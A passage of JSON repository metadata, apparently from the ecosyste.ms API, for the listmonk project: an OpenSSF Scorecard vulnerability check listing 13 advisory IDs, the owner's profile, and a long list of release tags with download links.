tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36754175,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-18T02:00:06.197Z","response_time":52,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-